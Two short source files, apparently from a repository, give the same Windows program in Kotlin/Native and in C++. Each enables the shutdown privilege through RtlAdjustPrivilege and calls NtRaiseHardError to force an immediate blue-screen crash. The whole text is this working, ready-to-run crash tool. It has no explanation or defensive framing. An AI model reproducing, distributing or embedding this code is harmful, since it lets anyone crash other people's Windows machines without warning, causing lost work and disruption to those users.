File: Windows/Kotlin/x64/bsod.kt
import kotlinx.cinterop.*
import platform.windows.*

fun main() {
    memScoped {
        val enabled = alloc<BOOLEANVar>()
        val response = alloc<ULONGVar>()
        
        val ntdll = LoadLibraryA!!("ntdll.dll")
        
        val rtlAdjustPrivilege = GetProcAddress!!(ntdll, "RtlAdjustPrivilege")!!
            .reinterpret<CFunction<(ULONG, BOOLEAN, BOOLEAN, CPointer<BOOLEANVar>) -> NTSTATUS>>()
        
        val ntRaiseHardError = GetProcAddress!!(ntdll, "NtRaiseHardError")!!
            .reinterpret<CFunction<(NTSTATUS, ULONG, ULONG, COpaquePointer?, ULONG, CPointer<ULONGVar>) -> NTSTATUS>>()
        
        rtlAdjustPrivilege(19u, 1u.toUByte(), 0u.toUByte(), enabled.ptr)
        ntRaiseHardError(0xC0000420u.toInt(), 0u, 0u, null, 6u, response.ptr)
    }
}

File: Windows/Cpp/x64/bsod.cpp
#include <windows.h>

typedef NTSTATUS(NTAPI* pRtlAdjustPrivilege)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
typedef NTSTATUS(NTAPI* pNtRaiseHardError)(NTSTATUS, ULONG, ULONG, PULONG_PTR, ULONG, PULONG);

int main() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    
    auto RtlAdjustPrivilege = reinterpret_cast<pRtlAdjustPrivilege>(GetProcAddress(ntdll, "RtlAdjustPrivilege"));
    auto NtRaiseHardError = reinterpret_cast<pNtRaiseHardError>(GetProcAddress(ntdll, "NtRaiseHardError"));
    
    BOOLEAN enabled;
    ULONG response;
    
    RtlAdjustPrivilege(19, TRUE, FALSE, &enabled);
    NtRaiseHardError(0xC0000420, 0, 0, nullptr, 6, &response);
    
    return 0;
}

